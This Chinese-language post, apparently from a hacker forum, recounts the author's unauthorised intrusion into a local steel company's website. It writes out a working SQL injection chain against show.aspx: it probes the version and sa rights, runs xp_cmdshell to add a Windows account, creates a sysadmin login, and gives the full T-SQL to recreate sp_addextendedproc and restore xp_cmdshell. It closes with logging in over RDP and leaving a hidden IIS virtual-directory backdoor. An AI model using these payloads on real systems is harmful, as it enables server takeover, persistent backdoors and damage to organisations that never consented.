今天没事做,对本地的一家钢铁企业的网站做了次安检,嘿嘿.漏洞一大把.当然 这是意料中的事.最近搞大家都喜欢搞脚本.那我也就从他们的网站程序看看了. show.aspx?id=1 嘿嘿 asp.net 照样暴 说什么有未闭合的分号. show.aspx?id=1 and (select @@version)>0;-- 果然,2003的系统 show.aspx?id=1 and sa=(select System_user)-- 嘿嘿 正确返回 有权限了 想到直接用xp_cmeshell直接添加帐号 因为之前已经知道这服务器开了3389的 所以 我们继续来: show.aspx?id=1;exec master.dbo.xp_cmdshell "net user haco lovehaco /add"-- 我倒,返回结果错误了 看来管理员还不是很可爱噢 那我们来恢复这个存储过程?OK 继续 show.aspx?id=1;exec master.dbo.sp_addextendedpro xp_cmdshell,@dllname=xplog70.dll-- 回车后......狂晕死.居然说什么过程sp_addextendedproc没找着 开始我以为是删除了xplog70.dll 可是后来不这样这样认为了 记得以前也碰到过这样的事 可是都没能解决 这次一定要搞定 嘿嘿!之后 到处问人 这里要感谢一下BST论坛里的tob88 谢谢 是他提醒了我 不就是过程SP_ADDextendedproc被删除了嘛 我们恢复它就是了嘛! 为了方便 我添加了个sysadmin的帐号 show.aspx?id=1;exec master.dbo.sp_addlogin haco,lovehaco;-- show.aspx?id=1;exec master.dbo.sp_addsrvrolemember haco,sysadmin;-- HOHO~ 搞定 俺自己装了MSSQL 企业管理器里连上这台服务器的SQL 调出查询器 恢复过程sp_addextendedproc 如下: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,sp_addextendedproc) return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 哈哈 试下 sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll 哇!命令成功完成 耶!添加帐号 登陆3389 留个我最喜欢的绝对后门 IIS隐藏虚拟目录 搞定 闪人......
PS:其实像sp_addextendedproc这些过程也都可以删除掉 就不能添加了 当然 也可以恢复的 这个恢复的语句 是从MSSQL数据库里得到的 有兴趣的朋友可以自己试试看 呵呵 这是我小泥巴第一次写东西 很稀烂的 大家看看就算了 别笑噢 要不 我会5555哭的噢!
|